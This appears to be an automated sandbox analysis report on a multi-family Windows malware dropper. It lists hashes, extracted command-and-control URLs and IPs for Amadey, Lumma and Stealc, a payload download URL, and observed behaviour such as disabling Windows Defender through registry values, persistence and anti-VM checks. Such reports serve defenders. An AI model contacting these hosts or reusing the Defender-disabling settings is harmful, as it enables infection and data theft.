Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30/03/2025, 13:33
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
8c87bad579d801bb7bea5acc51e8fe5d
-
SHA1
78b3bdaad59a371cf44e709e94ec00ccdc05421c
-
SHA256
dae649137a35a584025e94fee43e229a06818d9f9e600dd9d4a6917b2e01b6cb
-
SHA512
6fb9a96f6a83e42ae8be6b1ea00ba8417628a38e81654190f37602de36ee2ff6f1c7843eb9acd6991f254a5edfd5efc42b74af144a66fbb35b7fb410ca7692dc
-
SSDEEP
24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8a0Su:ATvC/MTQYxsWR7a0S
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://esccapewz.run/ANSbwqy
https://travewlio.shop/ZNxbHi
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://holidamyup.today/AOzkns
https://mtriplooqp.world/APowko
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/files/0x0006000000017570-38.dat family_xworm behavioral1/memory/2956-46-0x0000000000080000-0x00000000000A8000-memory.dmp family_xworm behavioral1/memory/2196-590-0x0000000000A00000-0x0000000000A28000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/3352-321-0x0000000001290000-0x00000000016EE000-memory.dmp healer behavioral1/memory/3352-322-0x0000000001290000-0x00000000016EE000-memory.dmp healer behavioral1/memory/3352-359-0x0000000001290000-0x00000000016EE000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 9d780b6f18.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 9d780b6f18.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 9d780b6f18.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 9d780b6f18.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 9d780b6f18.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 9d780b6f18.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 9d780b6f18.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 9d780b6f18.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 9d780b6f18.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 9d780b6f18.exe -
Stealc family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9c32fb17b4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0eb65cfefc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9d780b6f18.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 78577724d0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 532fd2aeef.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a4bb584db7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4aa41be87a.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2328 powershell.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 2328 powershell.exe 2064 powershell.exe 1384 powershell.exe 956 powershell.exe 844 powershell.exe -
Downloads MZ/PE file 12 IoCs
flow pid Process 7 1756 rapes.exe 7 1756 rapes.exe 7 1756 rapes.exe 7 1756 rapes.exe 7 1756 rapes.exe 7 1756 rapes.exe 7 1756 rapes.exe 7 1756 rapes.exe 7 1756 rapes.exe 7 1756 rapes.exe 7 1756 rapes.exe 4 2328 powershell.exe -
.NET Reactor proctector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x0006000000017570-38.dat net_reactor behavioral1/memory/2956-46-0x0000000000080000-0x00000000000A8000-memory.dmp net_reactor behavioral1/memory/2196-590-0x0000000000A00000-0x0000000000A28000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9d780b6f18.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 78577724d0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 78577724d0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 532fd2aeef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9c32fb17b4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0eb65cfefc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0eb65cfefc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a4bb584db7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a4bb584db7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4aa41be87a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9d780b6f18.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 532fd2aeef.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4aa41be87a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9c32fb17b4.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.lnk NP4kBrG.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.lnk NP4kBrG.exe -
Executes dropped EXE 18 IoCs
pid Process 2992 TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE 1756 rapes.exe 2956 NP4kBrG.exe 2672 9c32fb17b4.exe 2176 0eb65cfefc.exe 1996 smss.exe 1784 75c64a5fe4.exe 3352 9d780b6f18.exe 3624 78577724d0.exe 3880 d22426bcf1.exe 2088 532fd2aeef.exe 1700 svchost015.exe 3848 a4bb584db7.exe 3688 svchost015.exe 3180 70d75e69ad.exe 3368 4aa41be87a.exe 2196 smss.exe 3864 A9cowK5.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 9d780b6f18.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 532fd2aeef.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 4aa41be87a.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 9c32fb17b4.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 78577724d0.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine a4bb584db7.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine 0eb65cfefc.exe -
Loads dropped DLL 41 IoCs
pid Process 2328 powershell.exe 2328 powershell.exe 2992 TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE 2992 TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE 1756 rapes.exe 1756 rapes.exe 1756 rapes.exe 1756 rapes.exe 1756 rapes.exe 1756 rapes.exe 1756 rapes.exe 1756 rapes.exe 1756 rapes.exe 1756 rapes.exe 1756 rapes.exe 1756 rapes.exe 1756 rapes.exe 1756 rapes.exe 2088 532fd2aeef.exe 1756 rapes.exe 1756 rapes.exe 3848 a4bb584db7.exe 1756 rapes.exe 1756 rapes.exe 3216 WerFault.exe 3216 WerFault.exe 3216 WerFault.exe 3216 WerFault.exe 1756 rapes.exe 1756 rapes.exe 1756 rapes.exe 3676 MsiExec.exe 3740 rundll32.exe 3740 rundll32.exe 3740 rundll32.exe 3740 rundll32.exe 3740 rundll32.exe 3740 rundll32.exe 3740 rundll32.exe 3740 rundll32.exe 3740 rundll32.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 9d780b6f18.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 9d780b6f18.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\75c64a5fe4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381470101\\75c64a5fe4.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\9d780b6f18.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381480101\\9d780b6f18.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smss.exe" NP4kBrG.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\9c32fb17b4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381450101\\9c32fb17b4.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\0eb65cfefc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381460101\\0eb65cfefc.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\B: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0006000000018fdf-135.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 2992 TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE 1756 rapes.exe 2672 9c32fb17b4.exe 2176 0eb65cfefc.exe 3352 9d780b6f18.exe 3624 78577724d0.exe 2088 532fd2aeef.exe 3848 a4bb584db7.exe 3368 4aa41be87a.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2088 set thread context of 1700 2088 532fd2aeef.exe 82 PID 3848 set thread context of 3688 3848 a4bb584db7.exe 84 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 29 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 532fd2aeef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 75c64a5fe4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4aa41be87a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0eb65cfefc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 75c64a5fe4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d22426bcf1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9d780b6f18.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a4bb584db7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language A9cowK5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9c32fb17b4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 75c64a5fe4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 78577724d0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 2492 taskkill.exe 1692 taskkill.exe 2888 taskkill.exe 392 taskkill.exe 2364 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 6 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2340 schtasks.exe 1952 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 2328 powershell.exe 2328 powershell.exe 2328 powershell.exe 2992 TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE 1756 rapes.exe 2064 powershell.exe 1384 powershell.exe 956 powershell.exe 844 powershell.exe 2956 NP4kBrG.exe 2672 9c32fb17b4.exe 2672 9c32fb17b4.exe 2672 9c32fb17b4.exe 2672 9c32fb17b4.exe 2672 9c32fb17b4.exe 2176 0eb65cfefc.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 3352 9d780b6f18.exe 3352 9d780b6f18.exe 3352 9d780b6f18.exe 3352 9d780b6f18.exe 3624 78577724d0.exe 3624 78577724d0.exe 3624 78577724d0.exe 3624 78577724d0.exe 3624 78577724d0.exe 3624 78577724d0.exe 2088 532fd2aeef.exe 2088 532fd2aeef.exe 3848 a4bb584db7.exe 3848 a4bb584db7.exe 3368 4aa41be87a.exe 3368 4aa41be87a.exe 3368 4aa41be87a.exe 3368 4aa41be87a.exe 3368 4aa41be87a.exe 3368 4aa41be87a.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2236 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2328 powershell.exe Token: SeDebugPrivilege 2956 NP4kBrG.exe Token: SeDebugPrivilege 2064 powershell.exe Token: SeDebugPrivilege 1384 powershell.exe Token: SeDebugPrivilege 956 powershell.exe Token: SeDebugPrivilege 844 powershell.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeDebugPrivilege 2956 NP4kBrG.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeDebugPrivilege 1996 smss.exe Token: SeDebugPrivilege 2492 taskkill.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeDebugPrivilege 1692 taskkill.exe Token: SeDebugPrivilege 2888 taskkill.exe Token: SeDebugPrivilege 392 taskkill.exe Token: SeDebugPrivilege 2364 taskkill.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeDebugPrivilege 1704 firefox.exe Token: SeDebugPrivilege 1704 firefox.exe Token: SeDebugPrivilege 3352 9d780b6f18.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeDebugPrivilege 2196 smss.exe Token: SeDebugPrivilege 3864 A9cowK5.exe Token: SeShutdownPrivilege 2236 explorer.exe Token: SeShutdownPrivilege 3912 msiexec.exe Token: SeIncreaseQuotaPrivilege 3912 msiexec.exe Token: SeRestorePrivilege 3920 msiexec.exe Token: SeTakeOwnershipPrivilege 3920 msiexec.exe Token: SeSecurityPrivilege 3920 msiexec.exe Token: SeCreateTokenPrivilege 3912 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3912 msiexec.exe Token: SeLockMemoryPrivilege 3912 msiexec.exe Token: SeIncreaseQuotaPrivilege 3912 msiexec.exe Token: SeMachineAccountPrivilege 3912 msiexec.exe Token: SeTcbPrivilege 3912 msiexec.exe Token: SeSecurityPrivilege 3912 msiexec.exe Token: SeTakeOwnershipPrivilege 3912 msiexec.exe Token: SeLoadDriverPrivilege 3912 msiexec.exe Token: SeSystemProfilePrivilege 3912 msiexec.exe Token: SeSystemtimePrivilege 3912 msiexec.exe Token: SeProfSingleProcessPrivilege 3912 msiexec.exe Token: SeIncBasePriorityPrivilege 3912 msiexec.exe Token: SeCreatePagefilePrivilege 3912 msiexec.exe Token: SeCreatePermanentPrivilege 3912 msiexec.exe Token: SeBackupPrivilege 3912 msiexec.exe Token: SeRestorePrivilege 3912 msiexec.exe Token: SeShutdownPrivilege 3912 msiexec.exe Token: SeDebugPrivilege 3912 msiexec.exe Token: SeAuditPrivilege 3912 msiexec.exe Token: SeSystemEnvironmentPrivilege 3912 msiexec.exe Token: SeChangeNotifyPrivilege 3912 msiexec.exe -
Suspicious use of FindShellTrayWindow 47 IoCs
pid Process 3060 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3060 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3060 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2992 TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 1784 75c64a5fe4.exe 2236 explorer.exe 2236 explorer.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 1704 firefox.exe 1704 firefox.exe 1704 firefox.exe 1704 firefox.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 2236 explorer.exe 2236 explorer.exe 3912 msiexec.exe -
Suspicious use of SendNotifyMessage 36 IoCs
pid Process 3060 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3060 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3060 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 2236 explorer.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 1704 firefox.exe 1704 firefox.exe 1704 firefox.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe 1784 75c64a5fe4.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2956 NP4kBrG.exe -
Suspicious use of WriteProcessMemory 64 IoCs
